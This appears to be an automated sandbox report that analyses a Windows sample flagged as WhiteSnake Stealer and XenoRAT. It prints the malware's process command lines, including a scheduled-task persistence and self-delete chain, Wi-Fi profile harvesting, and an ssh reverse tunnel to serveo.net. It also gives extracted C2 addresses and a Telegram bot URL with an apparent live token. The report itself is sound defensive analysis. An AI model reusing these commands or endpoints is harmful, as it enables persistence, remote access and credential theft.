Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0LpFv1haTA.exe

Overview

General Information

Sample name:0LpFv1haTA.exe
renamed because original name is a hash value
Original sample name:1bafb4856a31ae27271fbd2ee1574a4f.exe
Analysis ID:1520806
MD5:1bafb4856a31ae27271fbd2ee1574a4f
SHA1:b8b3649d959524df2c4e8a94434fc0de90f95005
SHA256:91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
Tags:exeXenoRATuser-abuse_ch
Infos:

Detection

WhiteSnake Stealer, XenoRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XenoRAT
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 0LpFv1haTA.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\0LpFv1haTA.exe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
    • cmd.exe (PID: 5784 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 4996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • timeout.exe (PID: 6104 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • schtasks.exe (PID: 4288 cmdline: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • 0LpFv1haTA.exe (PID: 1964 cmdline: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
        • cmd.exe (PID: 7164 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 2284 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • netsh.exe (PID: 7096 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • findstr.exe (PID: 5996 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 5856 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 2684 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • netsh.exe (PID: 2952 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • findstr.exe (PID: 1976 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • ssh.exe (PID: 5856 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
          • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • manager.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Roaming\manager.exe" MD5: DA118F70D089DABFAB1B43B4CD87DB65)
          • manager.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\XenoManager\manager.exe" MD5: DA118F70D089DABFAB1B43B4CD87DB65)
            • schtasks.exe (PID: 7184 cmdline: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 0LpFv1haTA.exe (PID: 5500 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
    • cmd.exe (PID: 3852 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5968 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 744 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 1520 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 5300 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5260 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 5616 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6196 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • ssh.exe (PID: 7232 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
      • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7488 cmdline: C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • 0LpFv1haTA.exe (PID: 7992 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • manager.exe (PID: 2108 cmdline: C:\Users\user\AppData\Roaming\XenoManager\manager.exe MD5: DA118F70D089DABFAB1B43B4CD87DB65)
  • 0LpFv1haTA.exe (PID: 7388 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • 0LpFv1haTA.exe (PID: 174540 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • 0LpFv1haTA.exe (PID: 337928 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XenoRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xenorat

Malware Configuration

Threatname: XenoRAT

{"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
0LpFv1haTA.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\manager.exeJoeSecurity_XenoRATYara detected XenoRATJoe Security
      C:\Users\user\AppData\Roaming\XenoManager\manager.exeJoeSecurity_XenoRATYara detected XenoRATJoe Security
        C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
            00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: 0LpFv1haTA.exe PID: 1964JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Process Memory Space: 0LpFv1haTA.exe PID: 1964JoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security
                  Process Memory Space: 0LpFv1haTA.exe PID: 1964JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 4 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    41.0.manager.exe.240000.0.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\0LpFv1haTA.exe", ParentImage: C:\Users\user\Desktop\0LpFv1haTA.exe, ParentProcessId: 5948, ParentProcessName: 0LpFv1haTA.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", ProcessId: 5784, ProcessName: cmd.exe
                      Sigma detected: Invoke-Obfuscation VAR+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\0LpFv1haTA.exe", ParentImage: C:\Users\user\Desktop\0LpFv1haTA.exe, ParentProcessId: 5948, ParentProcessName: 0LpFv1haTA.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", ProcessId: 5784, ProcessName: cmd.exe
                      Sigma detected: Potentially Suspicious Malware Callback Communication
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.149.187.135, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, Initiated: true, ProcessId: 8128, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49744
                      Sigma detected: Communication To Uncommon Destination Ports
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.253.7.60, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, Initiated: true, ProcessId: 1964, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708
                      Sigma detected: Port Forwarding Activity Via SSH.EXE
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net, CommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" , ParentImage: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, ParentProcessId: 1964, ParentProcessName: 0LpFv1haTA.exe, ProcessCommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net, ProcessId: 5856, ProcessName: ssh.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XenoManager\manager.exe" , ParentImage: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, ParentProcessId: 8128, ParentProcessName: manager.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, ProcessId: 7184, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5784, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f , ProcessId: 4288, ProcessName: schtasks.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XenoManager\manager.exe" , ParentImage: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, ParentProcessId: 8128, ParentProcessName: manager.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, ProcessId: 7184, ProcessName: schtasks.exe

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Capture Wi-Fi password
                      Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" , ParentImage: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, ParentProcessId: 1964, ParentProcessName: 0LpFv1haTA.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7164, ProcessName: cmd.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T23:28:02.050959+020020458691A Network Trojan was detected192.168.2.549740149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T23:27:14.915873+020020506021A Network Trojan was detected192.168.2.549708185.253.7.608080TCP
                      2024-09-27T23:27:16.303924+020020506021A Network Trojan was detected192.168.2.549711185.253.7.608080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T23:27:14.861894+020020506011A Network Trojan was detected192.168.2.549708185.253.7.608080TCP
                      2024-09-27T23:27:16.252698+020020506011A Network Trojan was detected192.168.2.549711185.253.7.608080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-27T23:27:37.244014+020020458681Successful Credential Theft Detected192.168.2.549729167.99.138.2498080TCP
                      2024-09-27T23:27:58.620125+020020458681Successful Credential Theft Detected192.168.2.549737206.189.109.14680TCP
                      2024-09-27T23:27:59.523921+020020458681Successful Credential Theft Detected192.168.2.54973845.82.65.6380TCP
                      2024-09-27T23:28:00.420730+020020458681Successful Credential Theft Detected192.168.2.549739188.120.242.788817TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 0LpFv1haTA.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Found malware configuration
                      Source: 41.0.manager.exe.240000.0.unpackMalware Configuration Extractor: XenoRAT {"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
                      Source: 0LpFv1haTA.exe.5500.13.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Roaming\manager.exeReversingLabs: Detection: 91%
                      Multi AV Scanner detection for submitted file
                      Source: 0LpFv1haTA.exeReversingLabs: Detection: 81%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\manager.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: 0LpFv1haTA.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 7_2_00007FF848F187D1 CryptUnprotectData,7_2_00007FF848F187D1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F187C1 CryptUnprotectData,13_2_00007FF848F187C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 13_2_00007FF848F1890D CryptUnprotectData,13_2_00007FF848F1890D
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
                      Source: 0LpFv1haTA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeCode function: 4x nop then dec eax0_2_00007FF848F05453
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1D416h7_2_00007FF848F1CD0F
